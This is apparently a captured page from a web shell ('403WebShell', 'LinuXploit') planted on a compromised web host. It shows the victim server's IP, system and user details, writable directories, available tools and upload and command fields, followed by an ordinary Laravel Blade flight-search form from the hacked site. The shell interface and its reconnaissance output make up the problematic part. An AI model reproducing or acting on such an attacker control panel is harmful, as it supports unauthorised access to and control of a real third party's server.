Failed to save the file to the "xx" directory.

Failed to save the file to the "ll" directory.

Failed to save the file to the "mm" directory.

Failed to save the file to the "wp" directory.

403WebShell
403Webshell
Server IP : 66.29.132.124  /  Your IP : 3.138.174.45
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/wavevlvu/book24.ng/themes/Mytravel/Flight/frontend/layouts/search/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/wavevlvu/book24.ng/themes/Mytravel/Flight/frontend/layouts/search/form-search.blade.php
<form action="{{ route("flight.search") }}" class="form bravo_form d-flex mb-1 py-2" method="get">
    <div class="g-field-search">
        <div class="row ">
            @php $flight_search_fields = setting_item_array('flight_search_fields');
    $flight_search_fields = array_values(\Illuminate\Support\Arr::sort($flight_search_fields, function ($value) {
        return $value['position'] ?? 0;
    }));
            @endphp
            @if(!empty($flight_search_fields))
                @foreach($flight_search_fields as $field)
                    @php $field['title'] = $field['title_'.app()->getLocale()] ?? $field['title'] ?? "" @endphp
                    <div class="col-md-{{ $field['size'] ?? "6" }} mb-4 mb-xl-0 ">
                        @switch($field['field'])
                            @case ('service_name')
                            @include('Flight::frontend.layouts.search.fields.service_name')
                            @break
                            @case ('location')
                            @include('Flight::frontend.layouts.search.fields.location')
                            @break
                            @case ('date')
                            @include('Flight::frontend.layouts.search.fields.date')
                            @break
                            @case ('guests')
                            @include('Flight::frontend.layouts.search.fields.guests')
                            @break
                            @case ('seat_type')
                            @include('Flight::frontend.layouts.search.fields.seat_type')
                            @break
                            @case ('from_where')
                            @include('Flight::frontend.layouts.search.fields.from-where')
                            @break
                            @case ('to_where')
                            @include('Flight::frontend.layouts.search.fields.to-where')
                            @break
                        @endswitch
                    </div>
                @endforeach
            @endif
        </div>
    </div>

    <div class="g-button-submit align-self-lg-end">
        <button class="btn btn-blue-1 width-lg-200 text-white border-radius-2 font-weight-bold btn-md mb-xl-0 mb-lg-1 transition-3d-hover w-100 w-md-auto" type="submit"><i class="flaticon-magnifying-glass mr-2"></i> {{__("Search")}}</button>
    </div>
</form>

Youez - 2016 - github.com/yon3zu
LinuXploit